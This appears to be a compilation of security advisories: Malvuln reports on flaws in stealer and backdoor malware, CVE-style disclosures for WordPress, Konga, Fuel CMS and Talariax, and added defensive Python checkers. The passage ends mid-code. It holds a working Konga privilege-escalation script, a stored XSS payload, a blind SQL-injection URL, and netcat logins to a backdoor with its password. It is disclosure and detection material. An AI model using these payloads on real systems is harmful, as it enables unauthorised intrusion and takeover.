<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CollectorStealerBuilder v2.0.0 Panel<br />Vulnerability: Insecure Credential Storage<br />Description: The web panel for the Collector Stealer malware stores its operator login credentials in plaintext in its MySQL database (the password column of the users table). Third-party attackers who gain access to the system, or to a copy of the database, can read the panel username and password directly without having to crack hashes offline. The dump below also contains a default account, admin/admin.<br />Type: WebUI<br />MD5: 54530f88c8e4f4371c9418f00c256b1d<br />MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)<br />Vuln ID: MVID-2022-0458<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />--<br />-- phpMyAdmin SQL Dump<br />-- version 4.9.7<br />-- https://www.phpmyadmin.net/<br />--<br />-- Host: localhost<br />-- Generation Time: Feb 22, 2021 at 19:56<br />-- Server version: 5.7.21-20-beget-5.7.21-20-1-log<br />-- PHP Version: 5.6.40<br /><br />SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";<br />SET AUTOCOMMIT = 0;<br />START TRANSACTION;<br />SET time_zone = "+00:00";<br /><br /><br />/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;<br />/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;<br />/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;<br />/*!40101 SET NAMES utf8mb4 */;<br /><br />--<br />-- Database: `jkrefsewer_1`<br />--<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Table structure for table `Information`<br />--<br />-- Creation: Feb 19, 2021 at 11:04<br />-- Last update: Feb 22, 2021 at 16:54<br />--<br /><br />DROP TABLE IF EXISTS `Information`;<br />CREATE TABLE `Information` (<br /> `Build` text NOT NULL,<br /> `hash` text,<br /> `Date` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' ON UPDATE CURRENT_TIMESTAMP,<br /> `Country` text,<br /> `IP` text,<br /> `Cookies` int(11) DEFAULT NULL,<br /> `Passwords` int(11) DEFAULT NULL,<br /> `Cards` int(11) DEFAULT NULL,<br /> `Wallets` int(11) DEFAULT NULL,<br /> `Path` text<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8;<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Table structure for table `users`<br />--<br />-- Creation: Feb 17, 2021 at 14:15<br />--<br /><br />DROP TABLE IF EXISTS `users`;<br />CREATE TABLE `users` (<br /> `id` int(11) NOT NULL,<br /> `username` varchar(45) COLLATE utf8_unicode_ci NOT NULL,<br /> `password` varchar(45) COLLATE utf8_unicode_ci NOT NULL<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;<br /><br />--<br />-- Dumping data for table `users`<br />--<br /><br />INSERT INTO `users` (`id`, `username`, `password`) VALUES<br />(1, 'admin', 'admin');<br /><br />--<br />-- Indexes for dumped tables<br />--<br /><br />--<br />-- Indexes for table `users`<br />--<br />ALTER TABLE `users`<br /> ADD PRIMARY KEY (`id`);<br /><br />--<br />-- AUTO_INCREMENT for dumped tables<br />--<br /><br />--<br />-- AUTO_INCREMENT for table `users`<br />--<br />ALTER TABLE `users`<br /> MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;<br />COMMIT;<br /><br />/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;<br />/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;<br />/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
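Plaintext versus hashed credential storage, as an added example that is not Malvuln's code nor the panel's. It rebuilds the advisory's users table (id, username, password varchar(45)) in an in-memory SQLite database, seeds it with the dumped admin/admin row, and puts the panel's behaviour beside a hashed variant. The PBKDF2 work factor, the widened password column and the login helpers are assumptions; the schema and the default row are taken from the dump above.

```python
import hashlib
import hmac
import os
import sqlite3

# From the dump above: the panel's users table and its shipped default row.
WEAK_SCHEMA = ("CREATE TABLE users (id INTEGER PRIMARY KEY, "
               "username VARCHAR(45) NOT NULL, password VARCHAR(45) NOT NULL)")
DEFAULT_ROW = ("admin", "admin")

# Assumption: a current work factor for PBKDF2-HMAC-SHA256 (OWASP range).
PBKDF2_ROUNDS = 600_000


def hash_password(password, salt=None):
    """Salted PBKDF2 hash in a self-describing 'algo$rounds$salt$hash' string."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), dk.hex())


def verify_password(stored, candidate):
    _algo, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def plaintext_panel(username, password):
    """The panel as dumped: the raw password is what ends up in the row."""
    db = sqlite3.connect(":memory:")
    db.execute(WEAK_SCHEMA)
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    return db


def hashed_panel(username, password):
    """Hardened variant. The column is widened: varchar(45) cannot even hold a
    60-character bcrypt string, let alone a salted PBKDF2 record."""
    db = sqlite3.connect(":memory:")
    db.execute(WEAK_SCHEMA.replace("password VARCHAR(45)", "password VARCHAR(255)"))
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)",
               (username, hash_password(password)))
    return db


def dump_passwords(db):
    """What an attacker with database (or dump) access sees."""
    return [row[0] for row in db.execute("SELECT password FROM users")]


def login_plaintext(db, username, password):
    row = db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], password)


def login_hashed(db, username, password):
    row = db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None and verify_password(row[0], password)


if __name__ == "__main__":
    weak, hard = plaintext_panel(*DEFAULT_ROW), hashed_panel(*DEFAULT_ROW)
    print("plaintext panel leaks:", dump_passwords(weak))
    print("hashed panel leaks:   ", dump_passwords(hard))
    print("admin/admin logs in to both:",
          login_plaintext(weak, "admin", "admin"), login_hashed(hard, "admin", "admin"))
```

With the dumped schema the leak is total: reading the row is the same as knowing the password. With the hashed variant the same database access yields only a salted hash that still has to be brute-forced at the chosen work factor.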
<pre><code># Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 11/11/2021<br /># Exploit Author: Mohammed Aadhil Ashfaq<br /># Vendor Homepage: https://form2email.dwbooster.com/<br /># Version: 1.3.24<br /># Tested on: WordPress<br /><br />POC<br />1. Click "Contact Form to Email" in the admin menu:<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail<br />2. Create a new form with the name <script>alert(1)</script><br />3. Click Publish<br />4. The XSS triggers on the resulting page:<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687<br />5. Open a different browser that is logged in to WordPress, paste the URL and<br />press Enter. The XSS triggers again, showing that the payload is stored.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/ca294b2f778abc14fef6313b3cea7155.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: VulturiBuilder<br />Vulnerability: Insecure Permissions<br />Description: The malware drops an .EXE (hate.exe) in the root of the C:\ drive with an insecure ACL that grants Change (C) permission to the Authenticated Users group. Any standard user can therefore rename the dropped executable to disable it, or replace it with an executable of their own, and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: ca294b2f778abc14fef6313b3cea7155<br />Vuln ID: MVID-2022-0457<br />Disclosure: 01/19/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/11/2022 07:25 PM 298,496 hate.exe<br /> 1 File(s) 298,496 bytes<br /> 0 Dir(s) 27,531,624,448 bytes free<br /></code></pre>
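A checker for the weak-ACE pattern in the Vulturi finding above, as an added example that is not Malvuln's code. It parses cacls output and flags any ACE that gives a broad principal (Authenticated Users, Users, Everyone, INTERACTIVE) a right that lets the file be changed or replaced. The sample is the advisory's own cacls listing embedded as a string; the list of broad principals and the rights treated as "write" are assumptions, and the parser covers the plain `(flags)Letter` form shown, not cacls' `(special access:)` listings.

```python
import re

# Principals that any logged-on user belongs to; write access for them on a
# dropped binary means any local user can tamper with it. (Assumed list.)
BROAD_PRINCIPALS = {
    "NT AUTHORITY\\Authenticated Users",
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\INTERACTIVE",
}
# cacls rights letters that allow modifying or replacing the file.
WRITE_RIGHTS = {"C", "F", "W"}

# "C:\file.exe PRINCIPAL:(flags)R" on the first line, " PRINCIPAL:(flags)R" after.
ACE_RE = re.compile(r"^(?:(?P<path>[A-Za-z]:\\\S*)\s+)?(?P<principal>.+?):"
                    r"(?P<flags>(?:\([^)]*\))*[A-Z]*)\s*$")

# The advisory's cacls output, embedded as the sample input.
SAMPLE = """\
C:\\hate.exe BUILTIN\\Administrators:(ID)F
 NT AUTHORITY\\SYSTEM:(ID)F
 BUILTIN\\Users:(ID)R
 NT AUTHORITY\\Authenticated Users:(ID)C
"""


def parse_cacls(text):
    """Return (path, principal, rights) tuples. cacls prints the path only on
    the first ACE of each file, so it is carried forward to the indented ones."""
    entries, path = [], None
    for line in text.splitlines():
        m = ACE_RE.match(line.strip())
        if not m:
            continue
        if m.group("path"):
            path = m.group("path")
        # Strip inheritance flags such as (ID), (OI), (CI); the right is what remains.
        rights = re.sub(r"\([^)]*\)", "", m.group("flags"))
        entries.append((path, m.group("principal").strip(), rights))
    return entries


def weak_aces(text):
    """ACEs that let a broad principal change or replace the file."""
    return [(path, who, rights) for path, who, rights in parse_cacls(text)
            if who in BROAD_PRINCIPALS and rights in WRITE_RIGHTS]


if __name__ == "__main__":
    for path, who, rights in weak_aces(SAMPLE):
        print("WEAK: %s grants %s to %s" % (path, rights, who))
```

On a live host the same function can be fed the output of `cacls <file>` for each executable a sample drops; an empty result from weak_aces() means only administrators and SYSTEM can modify the binary.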
<pre><code># Exploit Title: KONGA 0.14.9 - Privilege Escalation<br /># Date: 10/11/2021<br /># Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)<br /># Vendor Homepage: https://github.com/pantsel/konga<br /># Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip<br /># Version: 0.14.9<br /># Tested on: Linux - Ubuntu 20.04.3 LTS (focal)<br /><br /># A low-privileged Konga user logs in, then issues a PUT to its own user<br /># record (api/user/ID) with "admin" set, and the API accepts the change.<br /><br />import sys<br /><br />import requests<br /><br />urlkonga = "http://www.example.com:1337/"  # change to your konga address (keep the trailing slash)<br />identifier = "usernormalkonga"  # change user<br />password = "changeme"  # change password<br /><br />headers = {<br />    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",<br />    "Content-Type": "application/json;charset=utf-8",<br />    "connection-id": "",<br />    "Origin": urlkonga,<br />    "Referer": urlkonga<br />}<br /><br /># Step 1: authenticate as the normal user and obtain its token and user id.<br />url = urlkonga + "login"<br />data = {<br />    "identifier": identifier,<br />    "password": password<br />}<br /><br />response = requests.post(url, json=data)<br />if response.status_code != 200:<br />    sys.exit("[-] Login failed: HTTP %d" % response.status_code)<br />json_object = response.json()<br />token = json_object["token"]<br />user_id = json_object["user"]["id"]<br />print("[+] Attack")<br />print("[+] Token " + token)<br />print("[+] Exploiting User ID " + str(user_id))<br /><br /># Step 2: update our own user record with admin set; the server does not<br /># check that the caller is allowed to change that field.<br />url2 = urlkonga + "api/user/" + str(user_id)<br />data2 = {<br />    "admin": "true",<br />    "passports": {<br />        "password": password,<br />        "protocol": "local"<br />    },<br />    "password_confirmation": password,<br />    "token": token<br />}<br /><br />print("[+] Change Normal User to Admin")<br />response2 = requests.put(url2, headers=headers, json=data2)<br />if response2.status_code == 200:<br />    print("[+] Success")<br />else:<br />    print("[-] Failed: HTTP %d %s" % (response2.status_code, response2.text[:200]))<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/204613443e555f73237ea43a2faecaa5_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.16<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware runs with SYSTEM integrity, listens on TCP port 1015 and is protected by Armadillo(3.00a-3.70a) & UPX(1.07)NRV,brute. However, the password "ddr_bkdoor" is weak and can be found at offset 0019F58C.<br />Type: PE32<br />MD5: 204613443e555f73237ea43a2faecaa5<br />Vuln ID: MVID-2022-0463<br />Dropped files: ddradmin.exe<br />Disclosure: 01/20/2022 <br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 1015<br />Login: ddr_bkdoor<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#HELP<br /><br />DOS Switch to MS-DOS prompt<br />DIR/LS/LIST Directory and file list<br />CD Entry directory<br />MD/MKDIR Make directory<br />PWD Get current dirctory<br />COPY/CP Copy file<br />DEL/RM Delete directory/file<br />REN/RENAME Rename file<br />MOVE/MV Move file<br />TYPE/CAT Type text file<br /><br />POPMSG Popup message box<br />SYSINFO Get system information<br />WHO/W Get current connections<br /><br />SHELL Execute command by system shell(cmd.exe)<br />EXEC/RUN Execute file by windows API(WinExec)<br />WS Windows list<br />PS Process list<br />KILL Kill process<br /><br />GET/GETFILE Download file from remote machine<br />PUT/PUTFILE Upload file to remote machine<br />WGET Get file from web server<br />FGET Get file from ftp server<br />FPUT Put file to ftp server<br />TELNET Connect to other host<br /><br />FTPD Start ftp service<br />TELNETD/TELD/EXPORT Start telnet service (export shell)<br /><br />REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port><br />REDIR_STOP Stop redirect tcp data<br />SNIFF Sniff ftp/smtp/pop3/http password what 
via ethernet<br />SNIFF_STOP Stop ethernet sniffer<br />KEYLOG Start keyboard record<br />KEYLOG_STOP Stop keyboard record<br /><br />REBOOT Reboot windows<br />SHUTDOWN Shutdown windows<br />EXIT Close current connection<br />QUIT Close all connection and abort service<br />REMOVE Remove service<br />VER/VERSION Version information<br />HELP/H/? Show help message<br /><br />Type "HELP | MORE" for multipage display.<br /><br />Command "HELP" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#POPMSG malvuln was here<br /><br />Command "POPMSG" succeed.<br /></code></pre>
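Locating a hardcoded backdoor password in a binary and reporting its file offset, the check behind the "can be found at offset 0019F58C" statement above. This is an added example, not Malvuln's code: the blob it scans is constructed here (zero filler with the password placed at the advisory's offset) so it runs offline; on a real case the bytes of the dropped file would be passed instead, after unpacking, since the advisory says the sample is UPX/Armadillo protected.

```python
import re

PASSWORD = b"ddr_bkdoor"         # the hardcoded login password from the advisory
ADVISORY_OFFSET = 0x0019F58C     # where the advisory says it sits


def build_sample_blob():
    """Constructed stand-in for the dropped file (not the real sample): zero
    filler with a banner string and the password at the advisory's offset."""
    blob = bytearray(ADVISORY_OFFSET + 64)
    banner = b"Wollf Remote Manager v1.6"
    blob[0x100:0x100 + len(banner)] = banner
    blob[ADVISORY_OFFSET:ADVISORY_OFFSET + len(PASSWORD)] = PASSWORD
    return bytes(blob)


def printable_strings(blob, min_len=6):
    """Mini `strings -t x`: (offset, text) for runs of printable ASCII."""
    return [(m.start(), m.group().decode("ascii"))
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_credential(blob, password=PASSWORD):
    """File offset of the hardcoded password, or -1 if it is not present."""
    return blob.find(password)


def looks_upx_packed(blob):
    """UPX leaves its marker in the packed image; strings inside the packed
    payload are not visible until the sample is unpacked (upx -d)."""
    return b"UPX!" in blob or b"UPX0" in blob


if __name__ == "__main__":
    blob = build_sample_blob()
    print("UPX marker present:", looks_upx_packed(blob))
    print("password %r at offset %08X" % (PASSWORD, find_credential(blob)))
    for off, text in printable_strings(blob):
        print("%08X %s" % (off, text))
```

If looks_upx_packed() is true on a real file, run the string scan on the unpacked copy; a packed image compresses the data section, so the password will not be found at a stable offset until then.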
<pre><code>Dear Full Disclosure Team,<br /><br />We are writing to submit a full disclosure for the following vulnerability<br />discovered for product Talariax sendQuick Alertplus server admin version<br />4.3. This is an updated reference for<br />https://seclists.org/fulldisclosure/2021/Oct/1.<br /><br />------------------------------------------------------------------------<br />*Title:* SQL injection vulnerability in Talariax sendQuick Alertplus server<br />admin version 4.3<br /><br />*CVE Reference:* **RESERVED** CVE-2021-26795<br />*Product:* Talariax sendQuick Alertplus server admin<br />*Vendor:* TalariaX Pte Ltd<br />*Vulnerable version:* Talariax sendQuick Alertplus Server Admin version 4.3<br />Patch no 8HF8 and below.<br />*Fixed version:* Patch no 8HF11<br />*Impact:* High<br />*Vulnerability Type:* SQL Injection (CWE-89)<br />*Vendor notification (and approval for disclosure):* 2021-Oct-05<br />*Public Disclosure:* 2021-Oct-06<br />*Discoverer:* Jerry Toh (t.ghimhong@gmail.com), Edmund Ong (<br />edmund.okx@gmail.com)<br /><br />------------------------------------------------------------------------<br /><br />*Vulnerability details:*<br /><br />SQL Injection in the web interface of Talariax sendQuick Alertplus server<br />admin allows an authenticated user to perform error-based SQL injection via<br />unsanitized form fields.<br /><br />The affected URL is found in the Roster Management function:<br />/appliance/shiftmgn.php<br /><br />The attached screenshots (see evidence*.jpeg) show that:<br />(1) The vulnerability was discovered: after a single quotation mark was<br />appended upon form submission, an error message stating an SQL syntax error<br />was thrown from the database.<br />(2) The finding was subsequently verified as fixed after input validation was<br />implemented in the fields.<br /><br /><br />------------------------------------------------------------------------<br /><br />*Proof of concept:*<br /><br />The following input fields were found to be vulnerable to SQL injection:<br />Navigate to "Roster Management" > Select Edit Roster > Day Selected > Input<br />fields "Roster Time" (see evidence-2.jpeg). The screenshot shows an error<br />message stating an SQL syntax error after a single quotation mark (') was<br />appended upon form submission.<br /><br />------------------------------------------------------------------------<br /><br />*Remediation:*<br /><br />Although the patch (Patch no 8HF11) was tested to have fixed this, it is<br />still recommended to use the latest product version/patches. Please<br />approach the vendor for the latest product patches.<br /><br />------------------------------------------------------------------------<br /><br />*Disclosure details:*<br />- 2021/10/04 Contacted email for permission to disclose<br />- 2021/10/05 Vendor responded and approved for public disclosure submission<br />- 2021/10/06 Public disclosure on SecLists (<br />https://seclists.org/fulldisclosure/2021/Oct/1)<br />- 2021/11/11 Added CVE details for public disclosure reference<br /><br />-----------------------------------------------------------------------------------<br />*Additional references:*<br />The email below is the vendor's approval of the disclosure request.<br /><br />Delivered-To: edmund.okx@gmail.com<br />Received: by 2002:a67:c982:0:0:0:0:0 with SMTP id y2csp1780343vsk;<br /> Mon, 4 Oct 2021 21:31:06 -0700 (PDT)<br /> (envelope-from <jswong@talariax.com>) id 1mXc6V-0004bO-R8; Tue, 05 Oct<br />2021 12:30:58 +0800<br />Reply-To: jswong@talariax.com<br />Subject: Re: Responsible disclosure of vulnerability in Talariax sendQuick<br />Alertplus server admin (patched)<br />To: Edmund Ong <edmund.okx@gmail.com><br />Cc: t.ghimhong@gmail.com<br />References: <CAO0qOZwUuMcjpwvdAg1B4vZ-qrWHfwjixaMMTDh2=<br />11Nr3N47g@mail.gmail.com><br />From: JS Wong 
<jswong@talariax.com><br />Organization: TalariaX Pte Ltd<br />Message-ID: <47e14d24-ee1d-5b06-8f2f-20c7fa586957@talariax.com><br />Date: Tue, 5 Oct 2021 12:30:58 +0800<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0)<br />Gecko/20100101 Thunderbird/78.14.0<br /><br />--------------DBF6FC3FBFBCBF83D5A5DEEB<br />Content-Type: text/plain; charset=utf-8; format=flowed<br />Content-Transfer-Encoding: 8bit<br /><br />Dear Edmund<br /><br />Hi! Thanks for informing us on the issue found. We are pleased to inform<br />that we had fixed the issue in our patches and as long as customer<br />update to the latest patches, the issue is resolved.<br /><br />If you wish to submit to public domain as CVE, we will not stop you from<br />doing so.<br /><br />Thanks for informing us<br /><br />Regards<br /><br />JS<br /><br />On 4/10/2021 7:24 pm, Edmund Ong wrote:<br />> Dear Talariax,<br />><br />> We discovered a SQL injection vulnerability on one of your product<br />> Talariax sendQuick Alertplus server admin during the period of Q4-2020<br />> to Q1-2021.<br />><br />> This commercial off-the-shelf product was used by one of our clients<br />> and they may or may not have reported this to you. The finding was<br />> subsequently addressed and finding was closed (as shown in the<br />> screenshots the affected patch no 8HF8, and the fix released was patch<br />> no 8HF11) although we do not have the specific product version that is<br />> affected but we have reason to believe that at that point of testing<br />> the product Talariax sendQuick Alertplus server admin version was<br />> version 4.3 (do correct us if this is wrong). 
We felt responsible to<br />> share this finding with you directly so that you could ensure this<br />> vulnerability would be (or had been) addressed in all subsequent<br />> releases.<br />><br />> *Finding details:* SQL Injection in the web interface of Talariax<br />> sendQuick Alertplus server admin allows an authenticated user to<br />> perform error-based SQL injection via unsanitized form fields.<br />><br />> *Affected URL:* /appliance/shiftmgn.php<br />><br />> *Evidence* (see attached screenshots evidence*.jpeg)<br />> We attached the following screenshots to evidence that:<br />> (1) Vulnerability was discovered showing that there is an error<br />> message which states that the SQL Syntax error after a single<br />> quotation mark was appended upon the form submission causing an error<br />> message which is thrown from the database<br />> (2) Finding was subsequently verified as fixed after input validation<br />> was implemented in the fields.<br />><br />> We would also like to seek your approval for us to perform responsible<br />> disclosure to the public of this information. The intention is to help<br />> potential victims gain knowledge and raise awareness that<br />> vulnerability exists, Talariax could also provide us a<br />> recommendation if you so please so that we could include in the<br />> writeup (e.g. 
such as to update to the latest patch and versions).<br />> Please note that if we don't hear from you within 14 days, we will<br />> proceed to do full disclosure through<br />> https://nmap.org/mailman/listinfo/fulldisclosure<br />> <https://nmap.org/mailman/listinfo/fulldisclosure>.<br />><br />> --<br />> Yours Sincerely,<br />> Edmund Ong<br /><br />-- <br />JS Wong (Mr.)<br />TalariaX Pte Ltd<br />76 Playfair Road #08-01 LHK2<br />Singapore 367996<br />Tel: +65 62802881 Fax: +65 62806882<br />Mobile: +65 96367680<br />Web: http://www.talariax.com<br /><br />CONFIDENTIALITY NOTE: This email and any files transmitted with it is<br />intended only for the use of the person(s)<br />to whom it is addressed, and may contain information that is privileged,<br />confidential and exempt from disclosure<br />under applicable law. If you are not the intended recipient, please<br />immediately notify the sender and delete<br />the email. If you are not the intended recipient please do not disclose,<br />copy, distribute or take any action in<br />reliance on the contents of this e-mail. Thank you.<br /><br /><br />------------------------------------------------------------------------<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/204613443e555f73237ea43a2faecaa5.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.16<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP port 1015 and has an FTPD feature that, when enabled, listens on TCP port 21. The FTP service does not validate credentials: third-party attackers who can reach an infected system can log on using any username/password combination.<br />Type: PE32<br />MD5: 204613443e555f73237ea43a2faecaa5<br />Vuln ID: MVID-2022-0462<br />Dropped files: ddradmin.exe<br />Disclosure: 01/20/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 21<br />220 Welcome to X-Ftp server ...<br />USER malvuln<br />331 User name okay, need password.<br />PASS malvuln<br />230 User logged in, proceed.<br /></code></pre>
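A probe for the accept-anything FTP authentication described above: it logs in twice with random, throwaway credentials and reports a bypass only if both attempts get a 230. Added example, not Malvuln's code. The bundled mock server is a constructed stand-in that replays the advisory's dialogue (220 banner, 331, 230) so the probe can be exercised offline; against a real host the call is probe_ftp_any_credentials("x.x.x.x", 21). Line endings and the 5-second timeout are assumptions.

```python
import secrets
import socket
import threading


def _readline(sock):
    """Read one CRLF-terminated FTP reply/command (empty string on EOF)."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("latin-1").rstrip("\r\n")


def ftp_login(host, port, user, password, timeout=5.0):
    """Run USER/PASS and return the three-digit reply code to PASS
    (230 = logged in, 530 = rejected), or None if the dialogue breaks."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if not _readline(s).startswith("220"):
            return None
        s.sendall(("USER %s\r\n" % user).encode())
        if not _readline(s).startswith("331"):
            return None
        s.sendall(("PASS %s\r\n" % password).encode())
        return _readline(s)[:3]


def probe_ftp_any_credentials(host, port, attempts=2):
    """True if every random username/password pair is accepted: no real
    account could match credentials that were just generated."""
    codes = [ftp_login(host, port, "u" + secrets.token_hex(4), secrets.token_hex(8))
             for _ in range(attempts)]
    return all(code == "230" for code in codes)


# --- constructed mock of the Wollf FTPD dialogue (not the malware itself) ---
def start_mock_wollf_ftpd():
    """Listen on an ephemeral localhost port and accept any USER/PASS."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed
                return
            with conn:
                conn.sendall(b"220 Welcome to X-Ftp server ...\r\n")
                if _readline(conn).upper().startswith("USER"):
                    conn.sendall(b"331 User name okay, need password.\r\n")
                if _readline(conn).upper().startswith("PASS"):
                    conn.sendall(b"230 User logged in, proceed.\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_mock_wollf_ftpd()
    print("malvuln/malvuln ->", ftp_login("127.0.0.1", port, "malvuln", "malvuln"))
    print("random credentials accepted:", probe_ftp_any_credentials("127.0.0.1", port))
    srv.close()
```

Two attempts with fresh random pairs rule out the case where a single guess happened to hit a real account; a properly authenticating server answers the PASS with a 530 for both.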
<pre><code># Exploit Title: Fuel CMS 1.4.13 - 'col' Parameter Blind SQL Injection (Authenticated)<br /># Date: 2021-04-11<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://www.getfuelcms.com/<br /># Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip<br /># Version: 1.4.13<br /># Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46<br /><br />Steps to Reproduce:<br />1. Log in to the admin panel.<br />2. Go to the "Activity Log" menu.<br />3. Select any "type" option.<br />4. The "col" parameter (the sort column of the listing) is vulnerable to time-based blind SQL injection. Append the query "and (select * from(select(sleep(1)))a)" to the value of the "col=" parameter.<br /><br />POC:<br />http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date and (select * from(select(sleep(1)))a)&fuel_inline=0<br /><br />Output:<br />With sleep(0) the response is not delayed.<br />With sleep(1) the response is delayed by 1 second.<br />With sleep(5) the response is delayed by 5 seconds.<br />With sleep(10) the response is delayed by 10 seconds.<br /></code></pre>
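Two checks for the SQL injection findings on this page (the Talariax error-based report and the Fuel CMS "col" time-based one), as added examples that are neither advisory's code. The first shows the shared root cause: an untrusted sort column or form value spliced into SQL, against an in-memory SQLite copy of a log table, beside an allow-listed fix. The second is the timing logic behind the sleep(0)/sleep(1)/sleep(5) observations above: each delayed request must take at least n seconds longer than the baseline. The table, its columns, the slack value and the simulated target are assumptions; SQLite has no sleep(), so the timing probe is exercised against a constructed sender that honours sleep(n) the way MySQL would.

```python
import re
import sqlite3
import time

ALLOWED_SORT_COLUMNS = {"id", "entry_date", "level", "message"}


def _db():
    """Assumed stand-in for the CMS activity-log table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logs (id INTEGER PRIMARY KEY, entry_date TEXT, level TEXT, message TEXT)")
    db.executemany("INSERT INTO logs (entry_date, level, message) VALUES (?, ?, ?)",
                   [("2021-04-11 10:00", "debug", "a"), ("2021-04-11 10:01", "error", "b")])
    return db


def list_logs_vulnerable(db, col, order="desc"):
    """Sort column spliced into the statement (the col= pattern): anything
    after the column name is parsed and executed by the database engine."""
    return db.execute("SELECT id FROM logs ORDER BY %s %s" % (col, order)).fetchall()


def list_logs_safe(db, col, order="desc"):
    """Identifiers cannot be bound as parameters, so allow-list them."""
    if col not in ALLOWED_SORT_COLUMNS or order.lower() not in ("asc", "desc"):
        raise ValueError("rejected sort parameter: %r %r" % (col, order))
    return db.execute("SELECT id FROM logs ORDER BY %s %s" % (col, order)).fetchall()


def error_based_signal(db, col):
    """Error-based detection as in the Talariax report: a stray quote or an
    unknown function makes the engine raise. Returns the error text or None."""
    try:
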